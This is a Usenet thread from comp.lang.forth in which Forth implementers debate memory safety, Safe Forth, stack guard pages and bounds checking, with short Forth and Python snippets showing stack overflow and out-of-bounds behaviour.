push for memory safe languages -- impact on Forth

What if the program writes a float to a byte location?

Do we have to go along and make Forth type-safe then?

-marcel

Krishna Myneni

2024-03-01 16:53:57 UTC

Post by mhx
What if the program writes a float to a byte location?
Do we have to go along and make Forth type-safe then?

We don't have to go along with anything. However, it might be useful to
consider how we can satisfy some of the concerns. It is not possible to
separate memory safety entirely from type safety, since an array of bytes
doesn't have the same memory bounds as an array of floats. Nevertheless,
index checking would be the same in both cases.

--
Krishna
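
The point about bounds can be sketched in a few lines of Python. This is
only an illustration under assumed names: capacity and store are made-up
helpers, not words from any Forth system mentioned in this thread. The
same 16-byte buffer has a different upper bound depending on the element
type, while the index check itself has the same form.

```python
import struct

def capacity(buf, fmt):
    """Number of whole elements of struct format `fmt` that fit in `buf`."""
    return len(buf) // struct.calcsize(fmt)

def store(buf, fmt, index, value):
    """Bounds-checked store; the check has the same form for every element type."""
    if not 0 <= index < capacity(buf, fmt):
        raise IndexError(f"index {index} out of range for format {fmt!r}")
    struct.pack_into(fmt, buf, index * struct.calcsize(fmt), value)

buf = bytearray(16)
print(capacity(buf, "B"))    # 16 byte-sized elements
print(capacity(buf, "<d"))   # 2 double-precision floats
store(buf, "B", 15, 255)     # last byte: accepted
store(buf, "<d", 1, 3.0)     # last float: accepted
try:
    store(buf, "<d", 15, 3.0)    # index 15 is valid for bytes, not for floats
except IndexError as e:
    print("rejected:", e)
```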

Anton Ertl

2024-03-01 18:02:10 UTC

Post by mhx
What if the program writes a float to a byte location?

That's not a safety problem (as long as the location is big enough for
the float), so one can design a Safe Forth variant that allows that.
But once you are already implementing all the Safety features, it's
relatively easy to prevent that, too. But of course, if you find that
you need that, you can add a word that does that without subverting
memory safety.

Post by mhx
Do we have to go along and make Forth type-safe then?

For memory safety, you certainly need a way to differentiate between
addresses and other data. Some programming languages use type
checkers for that, some use tagging. Safe Forth uses separate stacks.

- anton

--
M. Anton Ertl http://www.complang.tuwien.ac.at/anton/home.html
comp.lang.forth FAQs: http://www.complang.tuwien.ac.at/forth/faq/toc.html
New standard: https://forth-standard.org/
EuroForth 2023: https://euro.theforth.net/2023
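
A toy Python model of the "separate stacks" idea, as a sketch only. It is
not the Safe Forth word set; the class and method names are hypothetical.
Numbers live on a data stack, references live on an object stack, and
memory is reachable only through a reference plus a checked index, so no
number can ever be turned into an address.

```python
class SafeVM:
    """Toy model: integers on the data stack, references on the object stack."""

    def __init__(self):
        self.data = []      # plain numbers only
        self.objects = []   # references to bytearray objects only

    def push(self, n):
        self.data.append(int(n))

    def alloc(self, size):
        # Allocation yields a reference, never a number the program can alter.
        self.objects.append(bytearray(size))

    def store_byte(self):
        # ( value index -- ), target object taken from the object stack
        index = self.data.pop()
        value = self.data.pop()
        obj = self.objects[-1]
        if not 0 <= index < len(obj):
            raise IndexError("store outside object")
        obj[index] = value & 0xFF

    def fetch_byte(self):
        # ( index -- value ), source object taken from the object stack
        index = self.data.pop()
        obj = self.objects[-1]
        if not 0 <= index < len(obj):
            raise IndexError("fetch outside object")
        self.data.append(obj[index])

vm = SafeVM()
vm.alloc(4)
vm.push(65); vm.push(3); vm.store_byte()
vm.push(3); vm.fetch_byte()
print(vm.data)   # [65]
```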

Tristan Wibberley

2024-03-04 23:03:55 UTC

Post by mhx
What if the program writes a float to a byte location?

That's not a safety problem (as long as the location is big enough for
the float), so one can design a Safe Forth variant that allows that.

I'm not very familiar with forth yet, does this refer to writing to a
machine addressed location? If so, plenty of computers have alignment
requirements, a DoS can be introduced by the above action.

Also, if you write a byte to a float location, a variety of problems can
be introduced including running trap callbacks that were insufficiently
tested for the new program state, etc, killing the process and running
restart sequences where less volatile state can now be in an unusual
condition and new side-effects induced, and so on.

memory safety means maintaining invariant relations wrt. each memory
location.

Anton Ertl

2024-03-05 06:35:40 UTC

Post by Tristan Wibberley

Post by mhx
What if the program writes a float to a byte location?

That's not a safety problem (as long as the location is big enough for
the float), so one can design a Safe Forth variant that allows that.

I'm not very familiar with forth yet, does this refer to writing to a
machine addressed location?

Yes.

Post by Tristan Wibberley
If so, plenty of computers have alignment
requirements,

In general-purpose computers, that used to be the case in the 1990s,
but nowadays it is no longer the case. We have to use really old
hardware to test against alignment errors, and even on hardware that
has alignment requirements (like our 21264B machine from 2000), the OS
(Linux) emulates the behaviour of computers without these requirements
when the program performs an unaligned access, and I had to write a
special program to get signals for unaligned accesses
<https://www.complang.tuwien.ac.at/anton/uace.c>. And while the Linux
command setarch can turn on various compatibility features for old
programs, such as turning off ASLR, it does not include a feature for
making unaligned accesses trap on the appropriate hardware.

In any case, if we want to avoid unaligned FP accesses, one can design
a memory-safe Forth dialect such that it prevents unaligned FP
accesses, but not accessing the same memory as bytes and as FP values.

However, despite all that, my plan is to design Safe Forth in a way
where the commonly-used words do not support such kinds of accesses,
because the result will make most programming tasks easier. For
specialized uses there may be words that just treat the memory as
bytes, though.

Post by Tristan Wibberley
a DoS can be introduced by the above action.

DoS and more serious vulnerabilities can be introduced in lots of ways
in memory-safe programming languages, whether some mechanism prevents
writing floats to a byte location or not.

However, I should refine my sentence above to: "That's not a
memory-safety problem ...".

Post by Tristan Wibberley
Also, if you write a byte to a float location, a variety of problems can
be introduced including running trap callbacks that were insufficiently
tested for the new program state, etc, killing the process and running
restart sequences where less volatile state can now be in an unusual
condition and new side-effects induced, and so on.

Memory safety does not guarantee bug-freedom.

However, what you write appears to be a case of "Bedenkentraeger",
imagining all kinds of possible or impossible problems in order to
argue against something. In the present case, impossible problems:

In Gforth no floating-point operation traps, and I intend to keep that
behaviour for Safe Forth.

There is also no way to write "trap callbacks". If there was, and a
programmer used it, and it was insufficiently tested, the problem
would be that the code was insufficiently tested, not in writing the
byte to an address where later an FP value is read from.

Because there is no trap and no trap callback, the process is not
killed, and no restart sequence is run. If it was, the condition of
process-surviving state would be something that would have to be made
safe whether the system prevents accessing bytes and FP values at the
same addresses or not.

Post by Tristan Wibberley
memory safety means maintaining invariant relations wrt. each memory
location.

So?

- anton
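
The distinction between a memory-safety problem and an ordinary bug can
be illustrated with a small Python sketch (an analogy, not Forth: the
buffer and offsets are made up for the example). Writing a float into
bytes, or a byte into a float, changes the value that is read back but
never touches memory outside the buffer.

```python
import math
import struct

mem = bytearray(16)                   # a "byte location" big enough for a float
struct.pack_into("<d", mem, 0, 3.0)   # write a float into it
print(mem[:8].hex())                  # the same memory viewed as bytes

mem[6] = 0xF8                         # write single bytes into the "float location"
mem[7] = 0x7F
value = struct.unpack_from("<d", mem, 0)[0]
print(value, math.isnan(value))       # a different float (a NaN here), no trap

try:
    struct.pack_into("<d", mem, 12, 1.0)   # 8 bytes at offset 12 do not fit
except struct.error as e:
    print("rejected:", e)
```

The only access that is refused is the one that would leave the buffer.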

Tristan Wibberley

2024-03-05 07:58:20 UTC

...

Post by Tristan Wibberley
If so, plenty of computers have alignment
requirements,

In general-purpose computers, that used to be the case in the 1990s,
but nowadays it is no longer the case. We have to use really old
hardware to test against alignment errors. ...

Or special purpose computers that are not mass marketed, but I wasn't
aware they'd fixed all the public market computers. Thanks for the info.

minforth

2024-03-05 14:03:46 UTC

Post by Tristan Wibberley
....

Post by Tristan Wibberley
If so, plenty of computers have alignment
requirements,

In general-purpose computers, that used to be the case in the 1990s,
but nowadays it is no longer the case. We have to use really old
hardware to test against alignment errors. ...

Or special purpose computers that are not mass marketed, but I wasn't
aware they'd fixed all the public market computers. Thanks for the info.

You are still in for some nasty surprises with "public market" ARM CPUs.
f.ex.
https://developer.arm.com/documentation/den0013/d/Porting/Alignment

Hans Bezemer

2024-03-05 14:03:27 UTC

Post by Tristan Wibberley

Post by mhx
What if the program writes a float to a byte location?

That's not a safety problem (as long as the location is big enough for
the float), so one can design a Safe Forth variant that allows that.

I'm not very familiar with forth yet, does this refer to writing to a
machine addressed location? If so, plenty of computers have alignment
requirements, a DoS can be introduced by the above action.
Also, if you write a byte to a float location, a variety of problems can
be introduced including running trap callbacks that were insufficiently
tested for the new program state, etc, killing the process and running
restart sequences where less volatile state can now be in an unusual
condition and new side-effects induced, and so on.
memory safety means maintaining invariant relations wrt. each memory
location.

This entire discussion really made me laugh. How sentiments change..
I can remember when I wrote 4tH people were dismissing it, because of
its safety features: "This is not Forth".

But 4tH addresses most of the issues at hand. You cannot write a float
on a character, because those reside in different segments. You cannot
overwrite execution code - because that not only resides in a different
segment, but it's also "read only".

If your execution pointer goes outside the code segment, the program
simply stops. If you do a MOVE - any MOVE - it will check the bounds
before going at it at C speed.

Now - I won't say you can't do any damage. It doesn't do any array
bounds checking, so a string can spill into another string. But it will
not spill outside its segment. If you use a random integer value as a
pointer, it will be okay to corrupt anything inside that segment, but
not *OUTSIDE* that segment. And frankly, that's all the safety I need.
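
A rough Python sketch of segment-level checking as described above. It is
not how 4tH is implemented; Segment and SegmentError are hypothetical
names. Accesses are checked against the segment as a whole, so one string
can spill into its neighbour, but nothing can leave the segment.

```python
class SegmentError(Exception):
    pass

class Segment:
    """A fixed-size region; accesses are checked against the segment only."""

    def __init__(self, size):
        self.cells = bytearray(size)

    def store(self, addr, data):
        if addr < 0 or addr + len(data) > len(self.cells):
            raise SegmentError("access outside segment")
        self.cells[addr:addr + len(data)] = data

chars = Segment(16)
chars.store(0, b"abcd")          # string 1 at 0..3 (by convention only)
chars.store(4, b"wxyz")          # string 2 at 4..7
chars.store(0, b"ABCDEF")        # spills into string 2: allowed
print(bytes(chars.cells[:8]))    # b'ABCDEFyz'
try:
    chars.store(12, b"too long") # would leave the segment: refused
except SegmentError as e:
    print("stopped:", e)
```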

If you think you will revive Forth by jumping on that Rust bandwagon, I
think you're wrong. You won't attract a new audience and you won't get
the acceptance you crave. First and foremost, because I think Rust
is the wrong idea. It's been tried before - Ada, Pascal, Java - in some
sense: BASIC.

Good programmers exist because they are good programmers. Bad programs
exist because of bad programmers. Let me quote one of the foremost CS
scientists who ever lived:

"Ada will not meet its major objective, viz. that of reducing software
costs by standardization, and it will not be the vehicle for programs we
can rely upon, for it is so complicated that it defies the unambiguous
definition that is essential for these purposes. Long before the design
was frozen, computing scientists from all over the world have given
plenty of warning but the political body in question preferred to ignore
these warnings and to decide on a design that cannot be salvaged. From a
scientific point of view all further attention paid to Ada is a waste of
effort. But the sheer buying-power of the DoD makes Ada an undeniable
reality, which in combination with DARPA's policies for the funding of
software research can only increase the pressure to spend research
effort on the wrong problems.

Another series of stones in the form of "programming tools" is produced
under the banner of "software engineering", which, as time went by, has
sought to replace intellectual discipline by management discipline to
the extent that it has now accepted as its charter "How to program if
you cannot."

Let that sink in: "It will not be the vehicle for programs we can rely
upon, for it is so complicated that it defies the unambiguous definition
that is essential for these purposes". That is the very definition of Rust.

All the time you're spending getting your code to compile, you're not
creating programs. I'd say that's the reverse of productivity. The
higher the abstraction, the more difficult it is to understand - let
alone to teach.

Compare "pointer" to "a variable containing an address", the beauty of
"an object" to "a structure with a few function pointer fields" and a
bunch of syntactic sugar (i.e. object.method vs. method(object)).

Lifetimes? Borrowing? Are you kidding me? After programming in Forth for
over 30 years now, I'm slowly getting why I get things done in Forth
that I would never have imagined to tackle in C. Forth has some
remarkable principles. The stack is one of them. The principle "execute,
throw on the stack or throw an error" is another one. The dictionary,
consisting of a function pointer and a string is another one.

Simple principles, simple to grasp, but very powerful - especially when
combined. ColorForth added a few more, BTW.

I tend to trust my Forth programs a lot more than my C ones, for the
simple reason that there were a million (stack) errors I could have made
along the way - every single one of them capable of turning my beautiful
program into a steaming pile of dung.

So, safety, yes. I like that very much. I ventured into that very early
and I never regretted it. But apart from some basic checks it should
stop at the point where I have to convince a compiler that I know what
I'm doing.

Hans Bezemer

minforth

2024-03-05 18:32:03 UTC

Post by Hans Bezemer
I tend to trust my Forth programs a lot more than my C ones

Maybe you're a lousy, careless C programmer? (pun intended ;-))

But I agree with you that the world doesn't need a Safe Forth.

Still, everyone has their favourite baby (like you have your 4th)
and you can still learn a few things while exploring additional
security features and enjoy it for the intellectual exercise, as
Anton seems to be doing with gforth.

By the way, I don't want to go off on a tangent here. I use
security features myself (not in MinForth though), because the
cost of repairing faulty devices in remote locations is too high
to be careless.

The solution is a separate DSL (on top of a Forth nucleus) that
does not allow any direct memory access. Very simple sandboxing.
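
As a sketch of that kind of sandboxing (in Python rather than on a Forth
nucleus, and with a made-up word list), the interpreter below accepts only
integers and whitelisted words. There is simply no word for fetching or
storing memory, so scripts cannot express a direct memory access.

```python
def run(source, words):
    """Interpret whitespace-separated tokens: integers and whitelisted words only."""
    stack = []
    for token in source.split():
        if token in words:
            words[token](stack)
        else:
            try:
                stack.append(int(token))
            except ValueError:
                raise NameError(f"unknown word: {token}") from None
    return stack

# Hypothetical DSL vocabulary; note the absence of @ and !
WORDS = {
    "+":   lambda s: s.append(s.pop() + s.pop()),
    "*":   lambda s: s.append(s.pop() * s.pop()),
    "dup": lambda s: s.append(s[-1]),
}

print(run("2 3 + dup *", WORDS))   # [25]
try:
    run("1 0 !", WORDS)            # no store word exists in the DSL
except NameError as e:
    print(e)                       # unknown word: !
```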

Paul Rubin

2024-03-05 18:40:09 UTC

Post by Hans Bezemer
If you think you will revive Forth by jumping on that Rust bandwagon,
I think you're wrong.

Probably true, Forth users want something different than what Rust aims
to supply.

Post by Hans Bezemer
First and foremost, because I think Rust is the wrong idea. It's been
tried before - Ada, Pascal, Java - in some sense: BASIC.

BASIC's heyday was before my time, but it was very popular in a certain
crowd. Java was extremely successful in industry and I think it was at
the top of TIOBE for a while (it is #4 now). #1 is currently Python
which can be seen as a successor to BASIC. Pascal was intentionally
limited (it was intended as an instructional language) and yet it had
its own era of popularity because of Turbo Pascal and the P-system.

Ada was overcomplicated, but I think it also didn't gain traction
because the early Ada compilers were slow and expensive. If GNAT had
been available from the beginning, Ada would have gotten more use, imho.

Post by Hans Bezemer
Good programmers exist because they are good programmers. Bad programs
exist because of bad programmers.

The best programmers I know have released code with memory errors, so at
a certain point you have to stop blaming the human for being less
accurate than a machine.

Post by Hans Bezemer
"Ada will not meet its major objective... for it is so complicated
that it defies the unambiguous definition that is essential for these
purposes.

It's not particularly more complicated than C++ as far as I can tell,
and C++ is currently #3 on TIOBE.

Post by Hans Bezemer
"...for it is so complicated...". That is the very definition of Rust.
All the time you're spending getting your code to compile, you're not
creating programs.

Would you say the same of time you spend fixing bugs that you find
during testing?

Post by Hans Bezemer
I'd say that's the reverse of productivity. The higher the
abstraction, the more difficult it is to understand - let alone to
teach.

Picking the right level of abstraction to handle a problem is an
important skill in programming just like it is in math. We spend a lot
of time studying abstractions in math because they are useful. That
turns out to be true in programming as well.

Post by Hans Bezemer
Lifetimes? Borrowing? Are you kidding me?

This is just the language handling and checking an abstraction that
people have been doing manually long before Rust. If you look at the
CPython implementation, it does memory management by reference counting,
and it constantly uses the ideas of borrowed references internally.

I would say today though, most application programmers don't need Rust.
They will be more productive with garbage collected languages, at the
expense of some machine resources. Rust is for when those resources
can't be spared.

Post by Hans Bezemer
So, safety, yes. I like that very much. I ventured into that very
early and I never regretted it. But apart from some basic checks it
should stop at the point where I have to convince a compiler that I
know what I'm doing.

I see it the other way. If the compiler can find every error in my
program of type X, then simply fixing the program until the compiler
accepts it means I get a program that is free of that type of error.
That increases my confidence in the program. The trade-off is that such
features can make the language and the compiler harder to use. A big
part of research in languages is widening the classes of errors that the
compiler can check without the language becoming too difficult.

dxf

2024-03-02 00:45:37 UTC

Post by mhx
What if the program writes a float to a byte location?

Coincidentally I just received a report from a user attempting to do
exactly that (it was a cell, not a byte). Apparently his code worked
on Gforth, and he concluded DX-Forth was buggy. Sigh - if only all bugs
were this easy :)

minforth

2024-03-01 17:42:08 UTC

Forth by design is as unsafe as any assembler.
The only way to tame it is to run it in a black box.

Krishna Myneni

2024-03-01 18:42:31 UTC

Forth by design is as unsafe as any assembler. The only way to tame it
is to run it in a black box.

We may have an alternative, when necessary. The malleability of the
language lends itself to interfaces which can enforce memory safety.
Even without changes to the language itself, memory safety might be
provided by a library e.g. typed arrays, as long as one sticks to the
designed interface.

--
Krishna

minforth

2024-03-01 19:46:55 UTC

IMO you would just be creating another stack language, even if it just
looks like another Forth dialect from the outside.

If I need a relatively safe programming language, I would use SPARK.

Anton Ertl

2024-03-01 17:38:02 UTC

Post by Krishna Myneni
I'm wondering what the CS Forth users and Forth systems developers make
of the renewed recent push for use of memory-safe languages.

Which "renewed recent push" do you mean?

Post by Krishna Myneni
Certainly
Forth can add the type of contractual safety requirements e.g.,
implementing bounds checking, of a "memory-safe language". Do we need to
work on libraries for these provisions?

Some years ago I thought that we can make do by providing some kind of
secure dialect of standard Forth (with some additional words, and an
escape hatch to full Forth) [ertl-secure16]. But the secure dialect
was not intended to be watertight, only protect against mistakes.

In the meantime, I know more about the topic and think that it's
better to produce a watertight secure dialect (with an escape hatch).
Other people have been earlier in recognizing that and have created
Forth systems like Oforth or Eight. My own contribution to that
topic, Safe Forth [ertl22] is a paper design for now, but has the
selling point of requiring neither type tagging nor static type
checking.

I have not had any resonance wrt what I proposed in 2016. For my 2022
ideas, I have had one request on whether there already exists an
implementation.

@InProceedings{ertl-secure16,
author = {M. Anton Ertl},
title = {Security},
crossref = {euroforth16},
pages = {82--83},
url = {http://www.euroforth.org/ef16/papers/ertl-secure.pdf},
video = {https://wiki.forth-ev.de/lib/exe/fetch.php/events:security.mp4},
OPTnote = {presentation slides}
}
@Proceedings{euroforth16,
title = {32nd EuroForth Conference},
booktitle = {32nd EuroForth Conference},
year = {2016},
key = {EuroForth'16},
url = {http://www.complang.tuwien.ac.at/anton/euroforth/ef16/papers/proceedings.pdf}
}

@InProceedings{ertl22,
author = {M. Anton Ertl},
title = {Memory Safety Without Tagging nor Static Type Checking},
crossref = {euroforth22},
pages = {5--15},
url = {http://www.euroforth.org/ef22/papers/ertl.pdf},
url-slides = {http://www.euroforth.org/ef22/papers/ertl-slides.pdf},
OPTnote = {refereed},
abstract = {A significant proportion of vulnerabilities are due
to memory accesses (typically in C code) that
memory-safe languages like Java prevent. This paper
discusses a new approach to modifying Forth for
memory-safety: Eliminate addresses from the data
stack; instead, put object references on a separate
object stack and use \code{value}-flavoured words.
This approach avoids the complexity of static type
checking (used in, e.g., Java and Factor), and also
avoids the performance overhead of dynamic type
checking for non-memory operations. This paper
discusses the consequences of this approach on the
language, and on performance.}
}

- anton

Paul Rubin

2024-03-01 18:17:36 UTC

Post by Krishna Myneni
of the renewed recent push for use of memory-safe languages.

Which "renewed recent push" do you mean?

Krishna Myneni

2024-03-01 21:47:42 UTC

Post by Krishna Myneni
of the renewed recent push for use of memory-safe languages.

Which "renewed recent push" do you mean?

From the second link,

"While memory safe hardware and formal methods can be excellent
complementary approaches to mitigating undiscovered vulnerabilities, one
of the most impactful actions software and hardware manufacturers can
take is adopting memory safe programming languages. They offer a way to
eliminate, not just mitigate, entire bug classes. This is a remarkable
opportunity for the technical community to improve the cybersecurity of
the entire digital ecosystem."

It sounds like there are plans to use Rust for some of the Linux kernel
code.

--
KM

dxf

2024-03-02 06:02:27 UTC

Post by Krishna Myneni
of the renewed recent push for use of memory-safe languages.

Which "renewed recent push" do you mean?

It's good to have an application that works as planned but how does one
that misbehaves translate to 'security risk' and how does 'memory-safe'
prevent that?

"ONCD has the belief that better metrics enable technology providers to
better plan, anticipate, and mitigate vulnerabilities before they become
a problem."

That may be their belief (fancy word for hope) but do they have anything
to back it up?

a***@spenarnc.xs4all.nl

2024-03-02 09:47:18 UTC

Post by Krishna Myneni
of the renewed recent push for use of memory-safe languages.

Which "renewed recent push" do you mean?

https://www.tomshardware.com/software/security-software/white-house-urges-developers-to-avoid-c-and-c-use-memory-safe-programming-languages
https://www.whitehouse.gov/oncd/briefing-room/2024/02/26/press-release-technical-report/

It's good to have an application that works as planned but how does one
that misbehaves translate to 'security risk' and how does 'memory-safe'
prevent that?

"ONCD has the belief that better metrics enable technology providers to
better plan, anticipate, and mitigate vulnerabilities before they become
a problem."

That may be their belief (fancy word for hope) but do they have anything
to back it up?

Most Forthers have a blind spot about what safe means.
I grew up with Algol 60. The only errors you encountered were
array index errors and memory exhaustion. An index error showed which
array, the index, and a call tree. Memory exhaustion indicated that you
had infinite recursion.
On the other hand, FORTRAN programs showed a hex address and a dump of
the internal registers.

Groetjes Albert

--
Don't praise the day before the evening. One swallow doesn't make spring.
You must not say "hey" before you have crossed the bridge. Don't sell the
hide of the bear until you shot it. Better one bird in the hand than ten in
the air. First gain is a cat purring. - the Wise from Antrim -

dxf

2024-03-03 03:20:49 UTC

Post by a***@spenarnc.xs4all.nl

Post by Krishna Myneni
of the renewed recent push for use of memory-safe languages.

Which "renewed recent push" do you mean?

Blind is believing one doesn't have to think because the system has one's
back. Forth is brutal in dispelling any such notions.

Krishna Myneni

2024-03-02 14:35:25 UTC

Post by Krishna Myneni
of the renewed recent push for use of memory-safe languages.

Which "renewed recent push" do you mean?

It's good to have an application that works as planned but how does one
that misbehaves translate to 'security risk' and how does 'memory-safe'
prevent that?

See my example in C where a buffer overflow is exploited to run code
which would not ever be called for normal execution.

Also, see Anton's example in Gforth.

--
Krishna

minforth

2024-03-02 15:39:11 UTC

Harden these without runtime checks:
: RT1 2 3e recurse ;
: RT2 drop fdrop recurse ;

Krishna Myneni

2024-03-02 16:08:53 UTC

Post by minforth
: RT1 2 3e recurse ;
: RT2 drop fdrop recurse ;

Let's see what python does:

def rt1():
    return rt1()

rt1()
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "<stdin>", line 2, in rt1
  File "<stdin>", line 2, in rt1
  File "<stdin>", line 2, in rt1
  [Previous line repeated 996 more times]
RecursionError: maximum recursion depth exceeded

Clearly it is doing a runtime check. Similarly one could have RECURSE in
Forth perform a runtime check to enforce a recursion depth limit, and
indeed this type of error is caught by several Forth systems:

=== kForth example ===
: rt1 recurse ;
ok
rt1
Line 2: VM Error(-258): Return stack corrupt
rt1
=== end example ===

=== Gforth example ===
: rt1 recurse ; ok
rt1
*the terminal*:2:1: error: Return stack overflow
>>>rt1<<<

=== end example ===

--
Krishna
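
A minimal sketch of what such a runtime check in RECURSE could look like,
modelled in Python. The names call and ReturnStackOverflow and the limit
of 100 are assumptions for the example, not taken from kForth or Gforth.
Every nested call pushes onto an explicit return stack, and the call is
refused once a fixed depth is reached.

```python
class ReturnStackOverflow(Exception):
    pass

def call(word, rstack, limit=100):
    """Enter `word`, refusing to nest deeper than `limit` return addresses."""
    if len(rstack) >= limit:
        raise ReturnStackOverflow(f"return stack overflow at depth {len(rstack)}")
    rstack.append(word)
    try:
        word(rstack)
    finally:
        rstack.pop()          # unwind on normal return and on error

def rt1(rstack):
    call(rt1, rstack)         # the equivalent of RECURSE

rstack = []
try:
    call(rt1, rstack)
except ReturnStackOverflow as e:
    print(e)
print(len(rstack))            # the return stack is empty again after the error
```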

Krishna Myneni

2024-03-02 16:17:57 UTC

Post by minforth
: RT1 2 3e recurse ;
: RT2 drop fdrop recurse ;

Post by Krishna Myneni
Let's see what python does:

def rt1():
    return rt1()

rt1()
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "<stdin>", line 2, in rt1
  File "<stdin>", line 2, in rt1
  File "<stdin>", line 2, in rt1
  [Previous line repeated 996 more times]
RecursionError: maximum recursion depth exceeded

Clearly it is doing a runtime check. Similarly one could have RECURSE in
Forth perform a runtime check to enforce a recursion depth limit, and
indeed this type of error is caught by several Forth systems:

=== kForth example ===
: rt1 recurse ;
ok
rt1
Line 2: VM Error(-258): Return stack corrupt
rt1
=== end example ===

=== Gforth example ===
: rt1 recurse ; ok
rt1
*the terminal*:2:1: error: Return stack overflow
>>>rt1<<<
=== end example ===

To be clear, if you try to fill up the fp or data stack, as with your
rt1 example, kForth does give a segfault (and hence is susceptible to an
exploit), while Gforth still gives the same error.

--
Krishna

Anton Ertl

2024-03-02 16:43:10 UTC

Post by Krishna Myneni
=== Gforth example ===
: rt1 recurse ; ok
rt1
*the terminal*:2:1: error: Return stack overflow
>>>rt1<<<

=== end example ===

To be clear, if you try to fill up the fp or data stack, as with your
rt1 example, kForth does give a segfault (and hence is susceptible to an
exploit), while Gforth still gives the same error.

In Gforth on a Unix system, Unix produces a SIGSEGV when a stack runs
into a guard page. The signal handler then looks at the offending
address, and guesses that an access close to the bottom of a stack is
an underflow of that stack, and correspondingly for accesses close to
the top of a stack. This can be seen as follows:

With the gforth engine with the FP stack being empty:

fp@ 32769 - c@
*the terminal*:3:13: error: Floating-point stack overflow
fp@ 32769 - >>>c@<<<
fp@ 1+ c@
*the terminal*:4:8: error: Floating-point stack underflow
fp@ 1+ >>>c@<<<

- anton
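
The guessing step described above can be sketched as a pure function.
This is a Python model with assumed numbers (guard size, stack size and
addresses are all made up), not Gforth's actual signal handler: a faulting
address is attributed to a stack if it falls in the guard page just past
either end of that stack.

```python
GUARD = 4096  # assumed guard-page size in bytes

def classify(fault_addr, stack_lo, stack_hi):
    """Guess the cause of a faulting access from its address.

    The stack occupies [stack_lo, stack_hi) and grows downward, so the
    guard page below stack_lo catches overflows and the guard page
    starting at stack_hi catches underflows.
    """
    if stack_lo - GUARD <= fault_addr < stack_lo:
        return "stack overflow"
    if stack_hi <= fault_addr < stack_hi + GUARD:
        return "stack underflow"
    return "invalid memory address"

lo, hi = 0x10000, 0x18000          # made-up addresses, 32768-byte stack
sp_empty = hi                      # stack pointer of an empty stack
print(classify(sp_empty + 1, lo, hi))       # stack underflow
print(classify(sp_empty - 32769, lo, hi))   # stack overflow
print(classify(sp_empty - 65536, lo, hi))   # invalid memory address
```

Note that such a handler only runs when an access actually faults; an
address that skips past the guard page into other mapped memory would
never reach it.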

Krishna Myneni

2024-03-02 17:18:14 UTC

Post by Krishna Myneni
=== Gforth example ===
: rt1 recurse ; ok
rt1
*the terminal*:2:1: error: Return stack overflow
>>>rt1<<<

=== end example ===

To be clear, if you try to fill up the fp or data stack, as with your
rt1 example, kForth does give a segfault (and hence is susceptible to an
exploit), while Gforth still gives the same error.

Nice. The use of guard pages is something I need to look into to avoid
memory leaks or corruption for the stacks. Does this mean Gforth is
immune to arbitrary code execution attacks for the fp and data stack
overflow and underflow conditions?

--
Krishna

Anton Ertl

2024-03-02 18:03:32 UTC

Post by Krishna Myneni
Does this mean Gforth is
immune to arbitrary code execution attacks for the fp and data stack
overflow and underflow conditions?

Technically, one might answer "yes", but there are stack depth
violations that don't result in a stack overflow or underflow, and
that can lead to arbitrary code execution in Gforth. A simple example
is:

: bla ." bla" ;

: foo >r ;

' bla >body foo \ prints "bla"

Essentially, there are far too few guardrails in Gforth for the guard
pages to provide significant safety. For Gforth they are just a
convenience feature.

However, the idea of Safe Forth is to eliminate all these other ways
towards arbitrary code execution, and in Safe Forth the guard pages
will close the hole that stack overflows and underflows would
otherwise leave open.

Note that guard pages require OS support; Gforth uses the mprotect()
system call (of modern (since ~1990) Unix systems) for that.

- anton

Krishna Myneni

2024-03-02 23:07:02 UTC

Post by Krishna Myneni
=== Gforth example ===
: rt1 recurse ; ok
rt1
*the terminal*:2:1: error: Return stack overflow
>>>rt1<<<

=== end example ===

To be clear, if you try to fill up the fp or data stack, as with your
rt1 example, kForth does give a segfault (and hence is susceptible to an
exploit), while Gforth still gives the same error.

In the version of Gforth which I have (0.7.9_20220120),

fp@ 32769 - c@
*the terminal*:5:13: error: Floating-point stack overflow
fp@ 32769 - >>>c@<<<

However,

fp@ 65536 - c@ ok 1

and, worse,

1 fp@ 65536 - c! ok

So the guard pages are not a solution to pointer arithmetic bugs with
the stack pointers.

To make stack access memory safe, there has to be bounds checks on
reading and writing from/to stacks. This suggests that stacks should be
arrays and stack operations always involve array read/write from arrays
with enforced bounds checking e.g. something like

: DUP STACK[ tos ]@ ; \ TOS returns an index to the top of the stack
: OVER STACK[ tos 1+ ]@ ;

etc., where ]@ and ]! perform bounds checks.

I haven't yet looked at your paper on Safe Forth.

--
Krishna
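
The array-backed stack suggested above might look roughly like this when
modelled in Python. It is a sketch with hypothetical names (CheckedStack,
_at), and pick takes its argument as a parameter rather than from the
stack. Every read goes through one checked index computation, so a deep
PICK on a shallow stack is rejected instead of reading neighbouring
memory.

```python
class CheckedStack:
    def __init__(self, capacity):
        self.cells = [0] * capacity
        self.depth = 0

    def _at(self, n):
        """Index of the n-th item from the top (0 = top), checked against the live part."""
        if not 0 <= n < self.depth:
            raise IndexError("stack underflow")
        return self.depth - 1 - n

    def push(self, x):
        if self.depth >= len(self.cells):
            raise IndexError("stack overflow")
        self.cells[self.depth] = x
        self.depth += 1

    def pop(self):
        x = self.cells[self._at(0)]
        self.depth -= 1
        return x

    def dup(self):
        self.push(self.cells[self._at(0)])

    def over(self):
        self.push(self.cells[self._at(1)])

    def pick(self, n):
        self.push(self.cells[self._at(n)])

s = CheckedStack(4)
s.push(1); s.push(2)
s.over()                          # stack is now 1 2 1
print(s.cells[:s.depth])          # [1, 2, 1]
try:
    s.pick(600)                   # far deeper than the stack: rejected
except IndexError as e:
    print(e)                      # stack underflow
```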

Anton Ertl

2024-03-03 07:25:20 UTC

Post by Anton Ertl
fp@ 32769 - c@
*the terminal*:3:13: error: Floating-point stack overflow
fp@ 32769 - >>>c@<<<
fp@ 1+ c@
*the terminal*:4:8: error: Floating-point stack underflow
fp@ 1+ >>>c@<<<

Post by Krishna Myneni
In the version of Gforth which I have (0.7.9_20220120),

fp@ 32769 - c@
*the terminal*:5:13: error: Floating-point stack overflow
fp@ 32769 - >>>c@<<<

However,

fp@ 65536 - c@ ok 1

and, worse,

1 fp@ 65536 - c! ok

So the guard pages are not a solution to pointer arithmetic bugs with
the stack pointers.

Yes, that is not their intention and not the intention of these
examples. The intention of these examples is to show that any memory
access will be interpreted as a stack underflow or overflow if it is
to a certain range of addresses.

A more serious issue is that, as implemented in Gforth (in particular,
gforth-fast), stack underflows can be undetected in some cases: On
Gforth on an AMD64 system, with the data stack being empty:

600 pick ok 1

